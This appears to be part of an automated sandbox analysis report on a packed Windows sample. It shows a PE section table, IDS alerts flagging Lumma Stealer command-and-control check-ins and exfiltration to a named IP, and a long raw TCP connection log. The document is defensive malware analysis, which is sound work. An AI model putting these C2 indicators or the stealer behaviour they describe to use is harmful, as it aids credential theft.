| .rsrc | 0x52000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| elrlqfzp | 0x54000 | 0x2b1000 | 0x2b0200 | 25471db1d32fb1fbe840d0d5c2b299a6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| bgznktwl | 0x305000 | 0x1000 | 0x400 | 5fe07633e656140036d9ec143d69a67a | False | 0.8203125 | data | 6.323311416223315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x306000 | 0x3000 | 0x2200 | 0df22e67b98e9c0203da8a9b5c1f81cd | False | 0.08191636029411764 | DOS executable (COM) | 0.914158416188384 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| DLL | Import |
| kernel32.dll | lstrcpy |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2024-12-23T08:31:24.358092+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49709 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:25.370653+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.10 | 49709 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:25.370653+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49709 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:26.603782+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49715 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:27.384459+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.10 | 49715 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:27.384459+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49715 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:29.217430+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49721 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:31.800217+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49727 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:34.383974+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49733 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:37.289695+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49741 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:38.056395+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.10 | 49741 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:39.873395+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49752 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:45.261319+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49763 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:46.020963+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49763 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T08:31:47.601922+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49769 | 185.166.143.49 | 443 | TCP |
| 2024-12-23T08:31:50.046654+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49775 | 52.217.136.89 | 443 | TCP |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                                                              Dec 23, 2024 08:31:25.383908987 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:25.383940935 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:26.603604078 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:26.603781939 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:26.605078936 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:26.605088949 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:26.605411053 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:26.606740952 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:26.606740952 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:26.606817961 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.384543896 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.384761095 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.384836912 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.384846926 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.390829086 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.390928030 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.390975952 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.390984058 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.391030073 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.399245977 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.407752037 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.407898903 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.407907009 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.416079044 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.416176081 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.416184902 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.471201897 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.504060030 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.549372911 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.576293945 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.580102921 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.580250025 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.580260038 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.580343008 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.580523968 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.587794065 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.587794065 CET49715443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.587806940 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.587816954 CET44349715172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.994240046 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.994255066 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:27.994328976 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.994676113 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:27.994685888 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:29.217283010 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:29.217430115 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:29.218713045 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:29.218724012 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:29.219556093 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:29.220848083 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:29.221693993 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:29.221754074 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:30.485491991 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:30.485789061 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:30.485872984 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:30.485941887 CET49721443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:30.485966921 CET44349721172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:30.581231117 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:30.581288099 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:30.581407070 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:30.581691980 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:30.581708908 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:31.800132990 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:31.800216913 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:31.801487923 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:31.801496983 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:31.801752090 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:31.802970886 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:31.803128958 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:31.803164959 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:31.803229094 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:31.843332052 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:32.962543964 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:32.962641001 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:32.962752104 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:32.962918997 CET49727443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:32.962943077 CET44349727172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:33.171684980 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:33.171740055 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:33.171885967 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:33.172177076 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:33.172189951 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:34.383820057 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:34.383974075 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:34.385225058 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:34.385232925 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:34.385449886 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:34.386794090 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:34.386871099 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:34.386892080 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:34.386955023 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:34.386961937 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:35.540949106 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:35.541194916 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:35.541290045 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:35.541373014 CET49733443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:35.541389942 CET44349733172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:36.076812029 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:36.076853991 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:36.076978922 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:36.077394009 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:36.077409029 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:37.289410114 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:37.289695024 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:37.291327000 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:37.291337013 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:37.291579008 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:37.292877913 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:37.292877913 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:37.292912006 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:38.056385040 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:38.056529045 CET44349741172.67.150.173192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:38.056582928 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:38.056706905 CET49741443192.168.2.10172.67.150.173
                                                                                                                                                                              Dec 23, 2024 08:31:51.014851093 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.014883041 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.014900923 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.065031052 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.065059900 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.103703022 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.103717089 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.103734016 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.103741884 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.103830099 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.103871107 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.103893995 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.126998901 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.127012968 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.127033949 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.127065897 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.127239943 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.127274990 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.148210049 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.148221970 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.148245096 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.148251057 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.148293972 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.148322105 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.148349047 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.163069963 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.163089991 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.163157940 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.163177013 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.163192034 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.163192034 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.163211107 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.163230896 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.178044081 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.178065062 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.178107023 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.178119898 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.178152084 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.178167105 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.178193092 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.178210974 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.178210974 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.192234993 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.192338943 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.192466974 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.192466974 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.192481995 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.236900091 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.236912966 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.277817011 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.277906895 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.277931929 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.277935982 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.277972937 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.277986050 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.277995110 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.277995110 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.278019905 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.278619051 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.278681993 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.289815903 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.289832115 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.289865971 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.289923906 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.289948940 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.289966106 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.289984941 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.291416883 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.301249981 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.301268101 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.301332951 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.301347971 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.301361084 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.311696053 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.311767101 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.311830044 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.311830044 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.311866999 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.322791100 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.322849989 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.322874069 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.322885036 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.322910070 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.330634117 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.330687046 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.330709934 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.330722094 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.330753088 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.336937904 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.336987019 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.337013006 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.337028980 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.337044954 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.344089031 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.344131947 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.344150066 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.344177008 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.344199896 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.344238043 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.474081993 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.474144936 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.474240065 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.474244118 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.474284887 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.474303007 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.474303007 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.480241060 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.480293036 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.480319023 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.480329037 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.480355978 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.486608982 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.486651897 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.486692905 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.321873903 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.321913958 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.321950912 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.321952105 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.321963072 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.321980953 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.322000980 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.323692083 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.323712111 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.323738098 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.323821068 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.323821068 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.323821068 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.323831081 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.324636936 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.324659109 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.324696064 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.324702978 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.324733019 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.326086998 CET4434977552.217.136.89192.168.2.10
